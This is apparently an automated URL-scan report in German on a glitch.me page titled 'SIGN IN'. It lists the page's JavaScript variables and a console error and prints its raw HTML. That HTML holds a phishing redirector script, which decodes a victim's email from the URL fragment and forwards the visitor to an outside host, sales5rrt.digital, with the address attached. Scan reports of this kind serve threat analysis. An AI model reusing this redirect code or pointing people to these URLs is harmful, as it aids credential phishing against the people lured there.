https://heluniversalec.glitch.me/

Eingereichte URL:
https://heluniversalec.glitch.me/
Bericht beendet:

Die von der Seite ausgehenden identifizierten Links

JavaScript-Variablen · 5 gefunden

Globale JavaScript-Variablen, die in das Window Object einer Seite geladen werden, sind Variablen, die außerhalb von Funktionen deklariert werden und von jeder Stelle des Codes innerhalb des aktuellen Bereichs zugänglich sind

NameTyp
onbeforetoggleobject
documentPictureInPictureobject
onscrollendobject
base64Decodefunction
hashstring

Konsolenprotokoll-Meldungen · 1 gefunden

In der Web-Konsole protokollierte Meldungen

TypKategorieProtokoll
errornetwork
URL
https://heluniversalec.glitch.me/favicon.ico
Text
Failed to load resource: the server responded with a status of 404 ()

HTML

Der HTML-Rohtext der Seite

<!DOCTYPE html><html lang="en"><head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>SIGN IN</title>
</head>
<body>
<script>
  function base64Decode(str) {
    try {
      return decodeURIComponent(atob(str).split('').map(function(c) {
        return '%' + ('00' + c.charCodeAt(0).toString(16)).slice(-2);
      }).join(''));
    } catch (e) {
      console.error('Invalid base64 string:', str);
      return null;
    }
  }

  var hash = window.location.hash;
  if (hash !== "") {
    hash = hash.substring(1); // Remove the '#' character
    const email = base64Decode(hash);

    if (email) {
      window.location.href = "https://sales5rrt.digital/hdqops/Nandsrotomould.html#" + (email);
    }
  }
</script>

</body></html>